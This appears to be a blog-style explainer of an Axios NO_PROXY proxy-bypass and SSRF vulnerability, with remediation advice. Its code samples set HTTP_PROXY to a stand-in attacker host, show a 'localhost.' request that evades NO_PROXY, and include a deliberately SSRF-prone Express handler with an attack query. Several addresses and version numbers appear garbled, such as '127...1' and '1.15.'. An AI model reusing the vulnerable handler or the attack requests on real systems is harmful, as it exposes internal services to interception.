CVE-2025-62718 - Axios Proxy Bypass and SSRF Vulnerability Explained

The world of web development relies on trustworthy libraries. One of the most popular HTTP clients for JavaScript, Axios, faced a serious issue that you should know, especially if you use proxies for security. This post will break down CVE-2025-62718 and what it means for your apps, along with real code, how hackers can abuse it, and how to defend your systems.

What Exactly Went Wrong?

Axios (before version 1.15.) didn’t normalize hostnames correctly when checking for NO_PROXY rules. Basically, Axios missed the fact that localhost. (with a dot at the end) or certain IPv6 addresses like [::1] are local addresses, so it would *send* these requests through your proxy—even if you told it not to in your NO_PROXY settings.

Why’s This a Problem?

A “proxy bypass” like this is a big deal. Developers use the NO_PROXY setting to *avoid* sending sensitive requests for addresses like localhost or 127...1 through third-party proxies, keeping services secure and private. If attackers can trick Axios into sending these requests through a proxy, it opens the door for SSRF (Server-Side Request Forgery) attacks. With SSRF, hackers can potentially access sensitive internal resources.

How the NO_PROXY Misbehavior Happens

The NO_PROXY variable is meant to tell Axios and other HTTP clients to bypass the proxy for certain hosts. Most developers expect that listing hosts like localhost and 127...1 is enough. But normalized and unnormalized forms—like localhost. or [::1]—weren’t recognized as matching.

For example

// Proxy settings in Node.js
process.env.HTTP_PROXY = "http://bad-proxy.attacker.net:808";;
process.env.NO_PROXY = "localhost,127...1,::1";

With Axios (pre-1.15.), a request to http://localhost/ matches NO_PROXY, but http://localhost./ does not (because of the extra dot).

Let’s see what this looks like in code.

const axios = require('axios'); // use 1.14. or below to trigger the vuln

// Suppose you're trying to post data to a local admin panel
axios.post('http://localhost.:808/admin';, {cmd: 'status'})
  .then(res => console.log("Success:", res.status))
  .catch(err => console.error("Error:", err));

If NO_PROXY=localhost,127...1,::1 is set, you expect this *not* to go through the proxy. But with the dot at the end (localhost.), Axios will send it through the HTTP_PROXY anyway, possibly exposing your admin interface to attackers owning the proxy.

Exploit Details

1. Attacker-controlled Proxy: A hacker tricks the server into using an attacker’s proxy, maybe by manipulating environment variables or other config.
2. NO_PROXY Set Up Normally: Developers think they’re safe by listing local/internal addresses.
3. Malformed Hostname Request: The attacker makes a request to localhost. (or [::1], etc.)—a variation Axios fails to recognize.
4. SSRF in Action: Internal requests now go through the proxy, and the attacker can sniff traffic, record credentials, or make requests to other sensitive resources as if they were the server.

Imagine you have this server-side code (simplified)

const express = require('express');
const axios = require('axios');
const app = express();

app.get('/fetch-url', async (req, res) => {
  const url = req.query.url;
  try {
    const data = await axios.get(url);
    res.send(data.data);
  } catch (err) {
    res.status(500).send('Error!');
  }
});

If an attacker sends

GET /fetch-url?url=http://localhost.:808/secret

Despite expectations, Axios (until 1.15.) will forward this to the proxy—even if your NO_PROXY settings would otherwise block it. The proxy then gets internal data.

Upgrade Axios to 1.15.+

The Axios team fixed this vulnerability by correcting their hostname normalization and NO_PROXY checking. This is the most reliable fix.

npm install axios@latest

Always use up-to-date libraries.

- Sanitize inputs and consider restricting what URLs your backend fetches, especially user-controlled ones.

Axios Release Notes (1.15., Fix NO_PROXY):

https://github.com/axios/axios/releases/tag/v1.15.

Official CVE Record:

https://nvd.nist.gov/vuln/detail/CVE-2025-62718

Common SSRF Explanation:

https://portswigger.net/web-security/ssrf

Final Takeaways

CVE-2025-62718 is a classic example of how tiny details like a trailing dot or unusual bracket can lead to big security holes. Proxy bypasses can turn into full-blown SSRF vulnerabilities. If you’re an Axios user—especially in environments where proxy security is a concern—upgrade now.

Security is in the details! Always keep dependencies fresh, pay attention to changelogs, and watch for tricky differences in input that could fool your safeguards. Stay safe out there.


*Written exclusively for you. Reproduction prohibited without permission.

Timeline

Published on: 04/09/2026 14:31:46 UTC
Last modified on: 04/09/2026 17:16:24 UTC